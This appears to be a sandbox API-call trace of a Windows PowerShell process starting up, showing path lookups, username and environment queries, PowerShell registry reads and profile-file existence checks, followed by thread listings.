	[0736.368] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14d6d0 | out: lpFileInformation=0x14d6d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0736.368] SetErrorMode (uMode=0x1) returned 0x1
	[0736.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0736.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0736.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0736.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0736.398] CoTaskMemAlloc (cb=0x804) returned 0x280bb0
	[0736.398] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x280bb0, nSize=0x14da38 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x14da38) returned 0x1
	[0737.840] CoTaskMemFree (pv=0x280bb0) 
	[0737.840] CoTaskMemAlloc (cb=0x204) returned 0x2917a0
	[0737.840] GetUserNameW (in: lpBuffer=0x2917a0, pcbBuffer=0x14da78 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x14da78) returned 1
	[0737.840] CoTaskMemFree (pv=0x2917a0) 
	[0737.841] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fb2938*="Available", lpRawData=0x2fb26c8) returned 1
	[0739.419] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.419] CoTaskMemFree (pv=0x1b7c99c0) 
	[0739.420] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.420] CoTaskMemFree (pv=0x1b7c99c0) 
	[0739.422] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.422] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0739.422] CoTaskMemFree (pv=0x1b7c99c0) 
	[0739.422] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.422] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0739.422] CoTaskMemFree (pv=0x1b7c99c0) 
	[0739.425] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14da58 | out: phkResult=0x14da58*=0x384) returned 0x0
	[0739.425] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d9dc, lpData=0x0, lpcbData=0x14d9d8*=0x0 | out: lpType=0x14d9dc*=0x1, lpData=0x0, lpcbData=0x14d9d8*=0x56) returned 0x0
	[0739.425] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d26b0
	[0739.425] RegQueryValueExW (in: hKey=0x384, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d9ac, lpData=0x1b7d26b0, lpcbData=0x14d9a8*=0x56 | out: lpType=0x14d9ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d9a8*=0x56) returned 0x0
	[0739.425] CoTaskMemFree (pv=0x1b7d26b0) 
	[0739.425] RegCloseKey (hKey=0x384) returned 0x0
	[0739.426] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.426] CoTaskMemFree (pv=0x1b7c99c0) 
	[0739.440] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.440] CoTaskMemFree (pv=0x1b7c99c0) 
	[0739.470] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.470] CoTaskMemFree (pv=0x1b7c99c0) 
	[0739.471] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.471] CoTaskMemFree (pv=0x1b7c99c0) 
	[0739.472] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.472] CoTaskMemFree (pv=0x1b7c99c0) 
	[0739.473] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.473] CoTaskMemFree (pv=0x1b7c99c0) 
	[0739.474] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.475] CoTaskMemFree (pv=0x1b7c99c0) 
	[0739.475] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.475] CoTaskMemFree (pv=0x1b7c99c0) 
	[0739.504] CoTaskMemAlloc (cb=0x104) returned 0x1b7c99c0
	[0739.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c99c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.504] CoTaskMemFree (pv=0x1b7c99c0) 
	[0742.369] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b7c9ad0
	[0742.372] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b7c9be0
	[0746.492] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0746.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0746.492] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0747.778] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0747.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.778] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0747.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0747.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0747.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0747.806] VirtualQuery (in: lpAddress=0x14bd60, lpBuffer=0x14cc20, dwLength=0x30 | out: lpBuffer=0x14cc20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0747.811] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14dbb8 | out: phkResult=0x14dbb8*=0x2f8) returned 0x0
	[0747.811] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14db3c, lpData=0x0, lpcbData=0x14db38*=0x0 | out: lpType=0x14db3c*=0x1, lpData=0x0, lpcbData=0x14db38*=0x56) returned 0x0
	[0747.811] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d26b0
	[0747.811] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14db0c, lpData=0x1b7d26b0, lpcbData=0x14db08*=0x56 | out: lpType=0x14db0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14db08*=0x56) returned 0x0
	[0747.811] CoTaskMemFree (pv=0x1b7d26b0) 
	[0747.811] RegCloseKey (hKey=0x2f8) returned 0x0
	[0747.811] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14dbb8 | out: phkResult=0x14dbb8*=0x2f8) returned 0x0
	[0747.811] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14db3c, lpData=0x0, lpcbData=0x14db38*=0x0 | out: lpType=0x14db3c*=0x1, lpData=0x0, lpcbData=0x14db38*=0x56) returned 0x0
	[0747.811] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d26b0
	[0747.811] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14db0c, lpData=0x1b7d26b0, lpcbData=0x14db08*=0x56 | out: lpType=0x14db0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14db08*=0x56) returned 0x0
	[0747.812] CoTaskMemFree (pv=0x1b7d26b0) 
	[0747.812] RegCloseKey (hKey=0x2f8) returned 0x0
	[0747.812] CoTaskMemAlloc (cb=0x20c) returned 0x1b7c4970
	[0747.812] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7c4970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0747.812] CoTaskMemFree (pv=0x1b7c4970) 
	[0747.812] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0747.813] CoTaskMemAlloc (cb=0x20c) returned 0x1b7c4970
	[0747.813] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b7c4970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0747.813] CoTaskMemFree (pv=0x1b7c4970) 
	[0747.813] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0747.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0747.814] SetErrorMode (uMode=0x1) returned 0x1
	[0747.814] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14db20 | out: lpFileInformation=0x14db20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0747.814] SetErrorMode (uMode=0x1) returned 0x1
	[0747.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0747.814] SetErrorMode (uMode=0x1) returned 0x1
	[0747.814] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14db20 | out: lpFileInformation=0x14db20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0747.814] SetErrorMode (uMode=0x1) returned 0x1
	[0747.814] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x14d910, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0747.815] SetErrorMode (uMode=0x1) returned 0x1
	[0747.815] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14db20 | out: lpFileInformation=0x14db20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0747.815] SetErrorMode (uMode=0x1) returned 0x1
	[0747.815] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x14d910, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0747.815] SetErrorMode (uMode=0x1) returned 0x1
	[0747.815] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x14db20 | out: lpFileInformation=0x14db20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0747.815] SetErrorMode (uMode=0x1) returned 0x1
	[0747.816] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0747.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.816] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0747.816] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0747.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.816] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0747.817] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0747.817] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.817] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0747.817] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0747.817] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.818] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0747.818] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0747.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.818] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0747.819] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0747.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.819] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0749.179] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0749.179] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x14dd00 | out: lpMode=0x14dd00) returned 1
	[0749.181] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0749.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0749.181] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0749.184] SetEvent (hEvent=0x31c) returned 1
	[0749.185] SetEvent (hEvent=0x2f8) returned 1
	[0749.185] SetEvent (hEvent=0x390) returned 1
	[0749.185] SetEvent (hEvent=0x314) returned 1
	[0749.187] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0749.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0749.187] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0749.187] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x14da58 | out: phkResult=0x14da58*=0x34c) returned 0x0
	[0749.187] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x14d9dc, lpData=0x0, lpcbData=0x14d9d8*=0x0 | out: lpType=0x14d9dc*=0x0, lpData=0x0, lpcbData=0x14d9d8*=0x0) returned 0x2

Thread:
	id = 665
	os_tid = 0x14b4


Thread:
	id = 668
	os_tid = 0x14c4


Thread:
	id = 1034
	os_tid = 0x1b80


Thread:
	id = 1037
	os_tid = 0x1b98


Thread:
	id = 1043
	os_tid = 0x1bc0


Thread:
	id = 1058
	os_tid = 0x1448


Thread:
	id = 1063
	os_tid = 0x1408

	[0551.846] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0643.296] LocalFree (hMem=0x257290) returned 0x0
	[0643.296] CloseHandle (hObject=0x314) returned 1
	[0643.297] CloseHandle (hObject=0x13) returned 1
	[0643.298] CloseHandle (hObject=0xf) returned 1
	[0643.298] RegCloseKey (hKey=0x2fc) returned 0x0
	[0643.298] RegCloseKey (hKey=0x2f8) returned 0x0
	[0643.299] RegCloseKey (hKey=0x2f4) returned 0x0
	[0643.299] LocalFree (hMem=0x2572c0) returned 0x0
	[0661.325] RegCloseKey (hKey=0x2f4) returned 0x0
	[0683.118] RegCloseKey (hKey=0x2f4) returned 0x0
	[0739.457] RegCloseKey (hKey=0x38c) returned 0x0
	[0739.457] RegCloseKey (hKey=0x388) returned 0x0
	[0739.457] RegCloseKey (hKey=0x364) returned 0x0
	[0739.458] RegCloseKey (hKey=0x3a0) returned 0x0
	[0739.458] RegCloseKey (hKey=0x380) returned 0x0
	[0739.458] RegCloseKey (hKey=0x37c) returned 0x0
	[0739.459] RegCloseKey (hKey=0x378) returned 0x0
	[0739.459] RegCloseKey (hKey=0x374) returned 0x0
	[0739.459] RegCloseKey (hKey=0x370) returned 0x0
	[0739.459] RegCloseKey (hKey=0x36c) returned 0x0
	[0739.460] RegCloseKey (hKey=0x368) returned 0x0
	[0739.460] RegCloseKey (hKey=0x340) returned 0x0
	[0739.460] RegCloseKey (hKey=0x39c) returned 0x0
	[0739.460] RegCloseKey (hKey=0x398) returned 0x0
	[0739.461] RegCloseKey (hKey=0x360) returned 0x0
	[0739.461] RegCloseKey (hKey=0x35c) returned 0x0
	[0739.461] RegCloseKey (hKey=0x358) returned 0x0
	[0739.464] RegCloseKey (hKey=0x354) returned 0x0
	[0739.464] RegCloseKey (hKey=0x350) returned 0x0
	[0739.465] RegCloseKey (hKey=0x34c) returned 0x0
	[0739.465] RegCloseKey (hKey=0x348) returned 0x0
	[0739.465] RegCloseKey (hKey=0x344) returned 0x0
	[0739.466] RegCloseKey (hKey=0x394) returned 0x0
	[0739.466] RegCloseKey (hKey=0x334) returned 0x0
	[0739.466] RegCloseKey (hKey=0x330) returned 0x0
	[0739.466] RegCloseKey (hKey=0x32c) returned 0x0
	[0739.467] RegCloseKey (hKey=0x328) returned 0x0
	[0739.467] RegCloseKey (hKey=0x324) returned 0x0
	[0739.467] RegCloseKey (hKey=0x320) returned 0x0
	[0739.467] RegCloseKey (hKey=0x31c) returned 0x0
	[0739.468] RegCloseKey (hKey=0x314) returned 0x0
	[0739.468] RegCloseKey (hKey=0x390) returned 0x0
	[0739.468] RegCloseKey (hKey=0x2f8) returned 0x0
	[0739.468] RegCloseKey (hKey=0x2f4) returned 0x0
	[0782.544] RegCloseKey (hKey=0x34c) returned 0x0

Thread:
	id = 1153
	os_tid = 0x10d4


Thread:
	id = 1526
	os_tid = 0x1f2c

	[0750.350] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0750.357] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0750.362] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0750.362] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0750.362] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0750.364] VirtualQuery (in: lpAddress=0x1c6eda80, lpBuffer=0x1c6ee940, dwLength=0x30 | out: lpBuffer=0x1c6ee940*(BaseAddress=0x1c6ed000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0750.367] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0750.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0750.367] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0750.370] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0750.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0750.370] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0750.373] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0750.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0750.373] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0750.392] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0750.392] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0750.393] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0751.756] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0751.756] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.756] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0751.757] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0751.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.758] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0751.762] VirtualQuery (in: lpAddress=0x1c6edd30, lpBuffer=0x1c6eebf0, dwLength=0x30 | out: lpBuffer=0x1c6eebf0*(BaseAddress=0x1c6ed000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0751.763] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0751.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.763] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0751.766] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0751.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.766] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0751.766] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
	[0751.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7c9cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.766] CoTaskMemFree (pv=0x1b7c9cf0) 
	[0751.768] CoTaskMemAlloc (cb=0x104) returned 0x1b7c9cf0
